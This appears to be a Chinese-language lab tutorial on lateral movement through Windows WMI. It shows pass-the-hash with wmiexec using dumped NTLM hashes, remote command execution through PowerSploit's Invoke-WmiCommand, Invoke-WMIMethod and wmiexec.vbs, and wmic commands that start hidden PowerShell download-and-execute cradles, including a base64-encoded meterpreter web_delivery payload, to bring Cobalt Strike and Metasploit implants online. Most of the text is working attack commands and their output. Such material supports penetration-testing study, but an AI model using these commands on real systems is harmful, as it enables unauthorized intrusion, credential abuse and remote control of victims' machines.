5.2.2 只有Hash的情况下
wmiexec. -hashes LM Hash:NT Hash 域名/用户名@目标IP // 哈希传递获得shell wmiexec.exe -hashes LM Hash:NT Hash 域名/用户名@目标IP "ipconfig" // 执行命令 winserver08的hash信息 [00000003] Primary * Username : Administrator * Domain : USER03 * LM : d961cd0d7b411ca6e3fde35124ff2ad4 * NTLM : 82e5d5062f762c89c5d1ace3177becad * SHA1 : 4d7907fd1725cd4cf373bbe0a7d88af708752a8b wmiexec.exe -hashes d961cd0d7b411ca6e3fde35124ff2ad4:82e5d5062f762c89c5d1ace3177becad Administrator@192.168.135.15 wmiexec.exe -hashes d961cd0d7b411ca6e3fde35124ff2ad4:82e5d5062f762c89c5d1ace3177becad user03/Administrator@192.168.135.15
注意,在这里一定要注意域名/用户名之间不要有空格:
6. Invoke-WmiCommand.ps1
Invoke-WmiCommand是PowerSploit-3.0.0中的一个工具,该项目最终更停在2015年,下载地址:
https://github.com/PowerShellMafia/PowerSploit/releases/tag/v3.0.0
该脚本主要通过powershell调用WMI来远程执行命令,并可以对命令结果回显。
本次在win7上加载该脚本,在CodeExecution目录下:
Import-Module : 无法加载文件 C:\Users\crow\Desktop\10_PowerSploit-3.0.0\CodeExecution\Invoke-WmiC 统中禁止执行脚本。有关详细信息,请参阅 "get-help about_signing"。 所在位置 行:1 字符: 14 + Import-Module <<<< .\Invoke-WmiCommand.ps1 + CategoryInfo : NotSpecified: (:) [Import-Module], PSSecurityException + FullyQualifiedErrorId : RuntimeException,Microsoft.PowerShell.Commands.ImportModuleCommand
此时的问题主要是没有设置powershell的脚本执行权限,在当前需要使用管理员身份来解除限制:
set-executionpolicy remotesigned
然后选择y即可
Invoke-WmiCommand的使用方法:
#导入脚本 Import-Module .\Invoke-WmiCommand.ps1 #目标系统用户名 $User="administrator" #目标系统密码 $Password=ConvertTo-SecureString -String "Admin@admin" -AsPlainText -Force #将账号和密码整合起来,以便导入 Credential中 $Cred=New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $User,$Password #在远程系统中运行 ipconfig 命令 $Remote=Invoke-WmiCommand -Payload {ipconfig} -Credential $Cred -ComputerName 192.168.135.15 #将执行结果输出到屏幕上 $Remote.PayloadOutput # $User为 域名\用户名 # -String为 "密码" # -Payload为 {命令} # -ComputerName为 目标IP
当然,在这里可以使用;将命令连接起来:
Import-Module .\Invoke-WmiCommand.ps1;$User = "administrator";$Password = ConvertTo-SecureString -String "Admin@admin" -AsPlainText -Force;$Cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $User,$Password;$Remote=Invoke-WmiCommand -Payload {whoami} -Credential $Cred -ComputerName 192.168.135.15;$Remote.PayloadOutput
7. Invoke-WMIMethod.ps1
Invoke-WMIMethod.ps1模块是powershell自带的,可以在远程系统中执行命令和指定程序。
在powershell命令行环境执行命令,但是命令无法交互,并且没有结果回显。
命令如下:
$User="域名\用户名" // 指定目标系统用户名 $Password=ConvertTo-SecureString -String "密码" -AsPlainText -Force // 指定目标系统密码 $Cred=New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $User,$Password // 将账号和密码整合起来,以便导入 Credential中 Invoke-WMIMethod -Class Win32_Process -Name Create -ArgumentList "notepad.exe" -ComputerName "目标机IP" -Credential $Cred // 在远程系统中运行notepad.exe命令 命令参考自:https://www.freebuf.com/articles/246440.html
此时整和以下:
$User="administrator" // 指定目标系统用户名 $Password=ConvertTo-SecureString -String "Admin@admin" -AsPlainText -Force // 指定目标系统密码 $Cred=New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $User,$Password // 将账号和密码整合起来,以便导入 Credential中 Invoke-WMIMethod -Class Win32_Process -Name Create -ArgumentList "notepad.exe" -ComputerName "192.168.135.15" -Credential $Cred // 在远程系统中运行notepad.exe命令
放在一起:
$User="administrator";$Password=ConvertTo-SecureString -String "Admin@admin" -AsPlainText -Force;$Cred=New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $User,$Password;Invoke-WMIMethod -Class Win32_Process -Name Create -ArgumentList "notepad.exe" -ComputerName "192.168.135.15" -Credential $Cred
8. wmiexec.vbs
wmiexec.vbs脚本通过VBS调用WMI来模拟PsExec的功能。其可以在远程系统中执行命令并进行回显,获取远程主机的半交互式Shell。
下载地址:
8.1 使用方法
8.1.1 交互式shell
cscript.exe //nologo wmiexec.vbs /shell 192.168.135.15 administrator Admin@admin // cscript用于在Windows中执行脚本
8.1.2 非交互式shell
cscript.exe //nologo wmiexec.vbs /cmd 192.168.135.15 administrator Admin@admin "命令"
在这里一定要注意空格问题,只能空一格:
8.2 -wait参数(中间无空格)
对于运行时间比较长的命令,例如ping、systeminfo,需要添加 -wait5000或者更长时间的参数。
在这里基本上很多资料都写成了 -wait 5000(空格),这是错误的写法。
此时加上-wait5000之后:
而网上的错误写法:
10. wmic上线cobalt strike
10.1 环境准备
首先准备好环境,设置监听:
在这里选择Web投递,然后选择生成:
此时生成了命令:
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.22.105:80/a'))"
10.2 WMIC上线
在这里可以使用很多方法去上线,在这里选择较为原生的wmi命令上线测试,在这个命令里面因为有多个双引号,所以对其中powershell命令的双引号进行转义:\
wmic /node:192.168.135.15 /user:administrator /password:Admin@admin process call create "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.22.105:80/a'))\""
执行成功之后,此时木马上线:
11. wmic上线msf
11.1 环境准备
在这里使用web_delivery功能上线msf:
use exploit/multi/script/web_delivery
set payload 2
在这里修改下payload:
set payload windows/meterpreter/reverse_tcp
options
设置lhost :
set lhost 192.168.22.105
run
msf6 exploit(multi/script/web_delivery) > [*] Started reverse TCP handler on 192.168.22.105:4444 [*] Using URL: http://0.0.0.0:8080/gJaUcE2msw [*] Local IP: http://192.168.22.105:8080/gJaUcE2msw [*] Server started. [*] Run the following command on the target machine: powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABpAG0AcwBCAG0APQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AGkAZgAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFAAcgBvAHgAeQBdADoAOgBHAGUAdABEAGUAZgBhAHUAbAB0AFAAcgBvAHgAeQAoACkALgBhAGQAZAByAGUAcwBzACAALQBuAGUAIAAkAG4AdQBsAGwAKQB7ACQAaQBtAHMAQgBtAC4AcAByAG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMAdABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7ACQAaQBtAHMAQgBtAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIAMgAuADEAMAA1ADoAOAAwADgAMAAvAGcASgBhAFUAYwBFADIAbQBzAHcALwBhAGwAbgBOAHcAMQBUACcAKQApADsASQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMgAyAC4AMQAwADUAOgA4ADAAOAAwAC8AZwBKAGEAVQBjAEUAMgBtAHMAdwAnACkAKQA7AA==
11.2 wmic上线
在这可以选择两个方法上线:
wmic /node:192.168.135.15 /user:administrator /password:Admin@admin process call create "powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABpAG0AcwBCAG0APQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AGkAZgAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFAAcgBvAHgAeQBdADoAOgBHAGUAdABEAGUAZgBhAHUAbAB0AFAAcgBvAHgAeQAoACkALgBhAGQAZAByAGUAcwBzACAALQBuAGUAIAAkAG4AdQBsAGwAKQB7ACQAaQBtAHMAQgBtAC4AcAByAG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMAdABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7ACQAaQBtAHMAQgBtAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIAMgAuADEAMAA1ADoAOAAwADgAMAAvAGcASgBhAFUAYwBFADIAbQBzAHcALwBhAGwAbgBOAHcAMQBUACcAKQApADsASQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMgAyAC4AMQAwADUAOgA4ADAAOAAwAC8AZwBKAGEAVQBjAEUAMgBtAHMAdwAnACkAKQA7AA=="
也可以仿cs上的web方式上线:
wmic /node:192.168.135.15 /user:administrator /password:Admin@admin process call create "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.22.105:8080/gJaUcE2msw'))\""
12. 总结
本文对WMI的基本用法做了一个归类,其中参考了众多师傅的文章,WMI的用法远不止于此,而且本文是未对存在杀软的环境进行分析,等以后有机会再去探讨吧。
